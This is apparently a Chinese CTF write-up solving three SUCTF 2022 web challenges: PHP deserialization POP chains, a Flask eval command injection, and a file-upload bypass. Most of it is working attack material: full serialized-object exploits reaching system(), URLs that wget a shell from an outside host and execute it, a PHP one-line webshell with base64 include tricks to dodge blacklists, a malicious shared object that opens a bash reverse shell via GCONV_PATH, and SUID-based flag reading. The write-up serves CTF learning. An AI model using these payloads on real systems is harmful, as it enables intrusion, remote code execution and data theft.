ezpop
赛后看别的师傅的题解发现原来另一根链子能用,补充在下面
链子1
pop链构造
<?php
class crow
{
public $v1;
public $v2;
function eval() {
echo new $this->v1($this->v2);
}
public function __invoke()
{
$this->v1->world();
}
}
class fin
{
public $f1;
public function __destruct()
{
echo $this->f1 . '114514';
}
public function run()
{
($this->f1)();
}
public function __call($a, $b)
{
echo $this->f1->get_flag();
}
}
class what
{
public $a;
public function __toString()
{
$this->a->run();
return 'hello';
}
}
class mix
{
public $m1;
public function run()
{
($this->m1)();
}
public function get_flag()
{
eval('#' . $this->m1);
}
}
if (isset($_POST['cmd'])) {
unserialize($_POST['cmd']);
} else {
highlight_file(__FILE__);
}找链子,最终能够执行指令的地方有两处,crow->eval和mix->get_flag
但是mix->get_flag这个地方的eval被#污染了,属于是不可控的,所以我们能够控制的是crow->eval,显然这个地方可以利用PHP原生类实现任意文件读取。
那么目的就很明确了,我们的链子顺序
fin->__destruct()->what->toString()->mix->run()->crow->eval()
原生类的利用
# 读取文件
SplFileObject("php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php")
# 扫描文件
DirectoryIterator("glob:///var/www/html/f*")EXP
<?php
class crow
{
public $v1;
public $v2;
public function __construct()
{
$this->v1 = "SplFileObject";
$this->v2 = "php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php";
}
function eval() {
echo new $this->v1($this->v2);
}
public function __invoke()
{
$this->v1->world();
}
}
class what
{
public $a;
public function __construct()
{
$this->a = new mix();
}
public function __toString()
{
$this->a->run();
return 'hello';
}
}
class a
{
}
class mix
{
public $m1;
public function __construct()
{
$this->m1 = [new crow(), 'eval'];
// $this->m1 = "\$this->m1->eval";
}
public function run()
{
($this->m1)();
}
public function get_flag()
{
eval('#' . $this->m1);
}
}
class fin
{
public $f1;
public function __construct()
{
$this->f1 = new what();
// $this->fi = $this->fi+";#";
}
public function __destruct()
{
echo $this->f1 . '114514';
}
public function run()
{
($this->f1)();
}
public function __call($a, $b)
{
echo $this->f1->get_flag();
}
}
$a = new fin();
echo serialize($a);链子2
pop链构造
链子顺序为
fin->__destruct()->what->toString()->mix->run()->crow->__invoke()->fin->__call()->mix->get_flag()
虽然比我的那根链子要长,但是效果比我那根好,毕竟这根绕过#之后就rce了
eval注释绕过
$a = "\nsystem('ls');";
eval('#'.$a);也可以用\r\n,是一个效果,毕竟#只能注释单行
EXP
<?php
class crow
{
public $v1;
public $v2;
public function __construct($v1)
{
$this->v1 = $v1;
}
function eval() {
echo new $this->v1($this->v2);
}
public function __invoke()
{
$this->v1->world();
}
}
class what
{
public $a;
public function __construct($a)
{
$this->a = $a;
}
public function __toString()
{
$this->a->run();
return 'hello';
}
}
class a
{
}
class mix
{
public $m1;
public function __construct($m1)
{
$this->m1 = $m1;
}
public function run()
{
($this->m1)();
}
public function get_flag()
{
eval('#' . $this->m1);
}
}
class fin
{
public $f1;
public function __construct($f1)
{
$this->f1 = $f1;
}
public function __destruct()
{
echo $this->f1 . '114514';
}
public function run()
{
($this->f1)();
}
public function __call($a, $b)
{
echo $this->f1->get_flag();
}
}
$f = new mix("\nsystem('ls');");
$e = new fin($f);
$d = new crow($e);
$c = new mix($d);
$b = new what($c);
$a = new fin($b);
echo urlencode(serialize($a));这里构造的时候有一个不太一样的地方,这里的payload必须要url编码,不然\n无法被正常解析。
calc
给了源码
#coding=utf-8
from flask import Flask,render_template,url_for,render_template_string,redirect,request,current_app,session,abort,send_from_directory
import random
from urllib import parse
import os
from werkzeug.utils import secure_filename
import time
app=Flask(__name__)
def waf(s):
blacklist = ['import','(',')',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']
flag = True
for no in blacklist:
if no.lower() in s.lower():
flag= False
print(no)
break
return flag
@app.route("/")
def index():
"欢迎来到SUctf2022"
return render_template("index.html")
@app.route("/calc",methods=['GET'])
def calc():
ip = request.remote_addr
num = request.values.get("num")
log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)
if waf(num):
try:
data = eval(num)
os.system(log)
except:
pass
return str(data)
else:
return "waf!!"
if __name__ == "__main__":
app.run(host='0.0.0.0',port=5000) flask框架,首先想到的是有没有可能存在模板注入,但是由于黑名单过滤了太多东西,所以转向分析其他地方
分析calc路由,存在两个命令执行的地方,eval和system,可以基本确定是通过这两个地方进行命令注入
用%23(#)注释掉后半部分内容,反引号进行代码执行
上传shell并执行
http://99a1578a-dda3-4ea7-ac76-7179c5932e4a.node4.buuoj.cn:81/calc?num=2*2%23`wget%09-P%09/tmp/%09ephemerally.top:8080/shell`
http://99a1578a-dda3-4ea7-ac76-7179c5932e4a.node4.buuoj.cn:81/calc?num=2*2%23`chmod%09777%09/tmp/shell`
http://99a1578a-dda3-4ea7-ac76-7179c5932e4a.node4.buuoj.cn:81/calc?num=2*2%23`/tmp/shell`
upgdstore
简单分析
一个文件上传界面
<?php phpinfo();?>可以上传,查看发现disable_function拉满,但是file_get_contents没有被过滤
读取源码
<?php echo ('fil'.'e_get_contents')('/var/www/html/index.php');<div class="light"><span class="glow">
<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
嘿伙计,传个火?!
<input class="input_file" type="file" name="upload_file"/>
<input class="button" type="submit" name="submit" value="upload"/>
</form>
</span><span class="flare"></span><div>
<?php
function fun($var): bool{
$blacklist = ["\$_", "eval","copy" ,"assert","usort","include", "require", "$", "^", "~", "-", "%", "*","file","fopen","fwriter","fput","copy","curl","fread","fget","function_exists","dl","putenv","system","exec","shell_exec","passthru","proc_open","proc_close", "proc_get_status","checkdnsrr","getmxrr","getservbyname","getservbyport", "syslog","popen","show_source","highlight_file","`","chmod"];
foreach($blacklist as $blackword){
if(strstr($var, $blackword)) return True;
}
return False;
}
error_reporting(0);
//设置上传目录
define("UPLOAD_PATH", "./uploads");
$msg = "Upload Success!";
if (isset($_POST['submit'])) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_name = $_FILES['upload_file']['name'];
$ext = pathinfo($file_name,PATHINFO_EXTENSION);
if(!preg_match("/php/i", strtolower($ext))){
die("只要好看的php");
}
$content = file_get_contents($temp_file);
if(fun($content)){
die("诶,被我发现了吧");
}
$new_file_name = md5($file_name).".".$ext;
$img_path = UPLOAD_PATH . '/' . $new_file_name;
if (move_uploaded_file($temp_file, $img_path)){
$is_upload = true;
} else {
$msg = 'Upload Failed!';
die();
}
echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>";
}有个发现,黑名单判断用的是strstr,简而言之就是大小写敏感,所以可以大小写绕过关键词。
可以通过上传一个base64加密文件,然后用include来包含。比如传一句话木马
1.php
<?php eval($_REQUEST[1]);?>PD9waHAgZXZhbCgkX1JFUVVFU1RbMV0pOz8+上传之后文件名为f3b94e88bd1bd325af6f62828c8785dd.php
2.php
<?php
Include("php://filter/convert.base64-decode/resource=f3b94e88bd1bd325af6f62828c8785dd.php");?><?php Include(base64_decode("cGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWRlY29kZS9yZXNvdXJjZT1mM2I5NGU4OGJkMWJkMzI1YWY2ZjYyODI4Yzg3ODVkZC5waHA="));?>9bc09ee4e0eb91840f7c5207e1d84852.php
然后访问这个文件即webshell,但是因为disable_function太多的关系,需要bypass
使用GCONV_PATH和iconv的bypass
简单来说,我们需要做的是上传一个恶意so文件和gconv-modules,然后执行putenv去触发即可
exp.c
#include <stdio.h>
#include <stdlib.h>
void gconv() {}
void gconv_init() {
system("bash -c 'exec bash -i &>/dev/tcp/ip/port <&1'");
}编译成so文件
gcc exp.c -o exp.so -shared -fPICgconv-modules
module EXP// INTERNAL ../../../../../../../../tmp/exp 2
module INTERNAL EXP// ../../../../../../../../tmp/exp 2现在我们需要做的就是上传这两个文件
重写上传页面
因为原来的上传页面会更改你的上传文件名称以及固定上传路径,我们可以改写一个然后重新上传
3.php
<div class="light"><span class="glow">
<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
嘿伙计,传个火?!
<input class="input_file" type="file" name="upload_file"/>
<input class="button" type="submit" name="submit" value="upload"/>
</form>
</span><span class="flare"></span><div>
<?php
error_reporting(0);
//设置上传目录
define("UPLOAD_PATH", "/tmp");
$msg = "Upload Success!";
if (isset($_POST['submit'])) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_name = $_FILES['upload_file']['name'];
$ext = pathinfo($file_name,PATHINFO_EXTENSION);
$content = ('file_'.'get_contents')($temp_file);
$new_file_name = $file_name;
$img_path = UPLOAD_PATH . '/' . $new_file_name;
if (move_uploaded_file($temp_file, $img_path)){
$is_upload = true;
} else {
$msg = 'Upload Failed!';
die();
}
echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>";
}PGRpdiBjbGFzcz0ibGlnaHQiPjxzcGFuIGNsYXNzPSJnbG93Ij4KPGZvcm0gZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbWV0aG9kPSJwb3N0IiBvbnN1Ym1pdD0icmV0dXJuIGNoZWNrRmlsZSgpIj4KICAgIOWYv+S8meiuoe+8jOS8oOS4queBq++8n++8gQogICAgPGlucHV0IGNsYXNzPSJpbnB1dF9maWxlIiB0eXBlPSJmaWxlIiBuYW1lPSJ1cGxvYWRfZmlsZSIvPgogICAgPGlucHV0IGNsYXNzPSJidXR0b24iIHR5cGU9InN1Ym1pdCIgbmFtZT0ic3VibWl0IiB2YWx1ZT0idXBsb2FkIi8+CjwvZm9ybT4KPC9zcGFuPjxzcGFuIGNsYXNzPSJmbGFyZSI+PC9zcGFuPjxkaXY+Cjw/cGhwCmVycm9yX3JlcG9ydGluZygwKTsKLy/orr7nva7kuIrkvKDnm67lvZUKZGVmaW5lKCJVUExPQURfUEFUSCIsICIvdG1wIik7CiRtc2cgPSAiVXBsb2FkIFN1Y2Nlc3MhIjsKaWYgKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pKSB7CiR0ZW1wX2ZpbGUgPSAkX0ZJTEVTWyd1cGxvYWRfZmlsZSddWyd0bXBfbmFtZSddOwokZmlsZV9uYW1lID0gJF9GSUxFU1sndXBsb2FkX2ZpbGUnXVsnbmFtZSddOwokZXh0ID0gcGF0aGluZm8oJGZpbGVfbmFtZSxQQVRISU5GT19FWFRFTlNJT04pOwoKJGNvbnRlbnQgPSAoJ2ZpbGVfJy4nZ2V0X2NvbnRlbnRzJykoJHRlbXBfZmlsZSk7CgokbmV3X2ZpbGVfbmFtZSA9ICRmaWxlX25hbWU7CiAgICAgICAgJGltZ19wYXRoID0gVVBMT0FEX1BBVEggLiAnLycgLiAkbmV3X2ZpbGVfbmFtZTsKICAgICAgICBpZiAobW92ZV91cGxvYWRlZF9maWxlKCR0ZW1wX2ZpbGUsICRpbWdfcGF0aCkpewogICAgICAgICAgICAkaXNfdXBsb2FkID0gdHJ1ZTsKICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAkbXNnID0gJ1VwbG9hZCBGYWlsZWQhJzsKICAgICAgICAgICAgZGllKCk7CiAgICAgICAgfQogICAgICAgIGVjaG8gJzxkaXYgc3R5bGU9ImNvbG9yOiNGMDAiPicuJG1zZy4iIExvb2sgaGVyZX4gIi4kaW1nX3BhdGguIjwvZGl2PiI7Cn0=af6f4397ef14747a05a530270c618ce3.php
4.php
<?php
Include("php://filter/convert.base64-decode/resource=af6f4397ef14747a05a530270c618ce3.php");?><?php Include(base64_decode("cGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWRlY29kZS9yZXNvdXJjZT1hZjZmNDM5N2VmMTQ3NDdhMDVhNTMwMjcwYzYxOGNlMy5waHA="));?>6e63939ca97a5887ff9e0442e4b8a17e.php
然后访问上传exp.so以及gconv-modules
getshell
访问之前我们写好的马9bc09ee4e0eb91840f7c5207e1d84852.php,执行
1=putenv("GCONV_PATH=/tmp/");include('php://filter/read=convert.iconv.exp.utf-8/resource=/tmp/exp.so');
发现flag是600
查找SUID命令
find / -user root -perm -4000 -print 2>/dev/null发现nl指令
nl /flag